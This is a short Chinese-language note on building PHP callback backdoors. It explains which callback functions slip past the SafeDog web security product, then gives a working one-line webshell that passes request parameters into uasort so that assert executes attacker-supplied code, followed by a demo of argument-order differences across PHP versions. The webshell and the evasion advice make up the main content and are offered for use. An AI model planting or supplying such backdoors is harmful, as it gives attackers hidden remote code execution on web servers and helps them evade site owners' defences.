PHP 回調後門筆記

標籤：回調後門

在php中 存在回呼函數參數的函數，都有可能作為後門

比如array_map , array_filter 這類數組操作的回呼函數，但是在安全狗下會被殺掉

但是uasort 這類函數不會被殺掉。

php5.4.8之後的assert

在5.4.8之後，assert函數由一個參數，變成了兩個參數。增加了一個選擇性參數descrition：

5.4.8增加了參數 description。 description 現在也作為第四個參數提供給 ASSERT_CALLBACK 模式裡的回呼函數。

那麼這裡就可以使用有兩個參數的回呼函數了，比如

<?php$e = $_REQUEST[‘e‘];$arr = array($_REQUEST[‘pass‘] , ‘te‘);uasort($arr , $e);

在php5.3環境下會報錯，因為5.3的assert只有一個參數。

在php5.4以後就可以執行了

這裡的傳遞參數的順序也有變化，在php7之前不包括PHP7 ， 傳遞參數是array的第一個參數就是回呼函數的第二個參數。

在php7及以後，array的第一個參數是回呼函數的第一個參數。

比如：

function mysort($var_1 , $var_2){echo "var_1 : ".$var_1."<br>";echo "var_2 : ".$var_2."<br>";}$arr = array("1" , "2");uasort($arr , ‘mysort‘);

在php7以前的環境輸出：

var_1 : 2
var_2 : 1

在php7及其以後的環境輸出：

var_1 : 1
var_2 : 2

PHP 回調後門筆記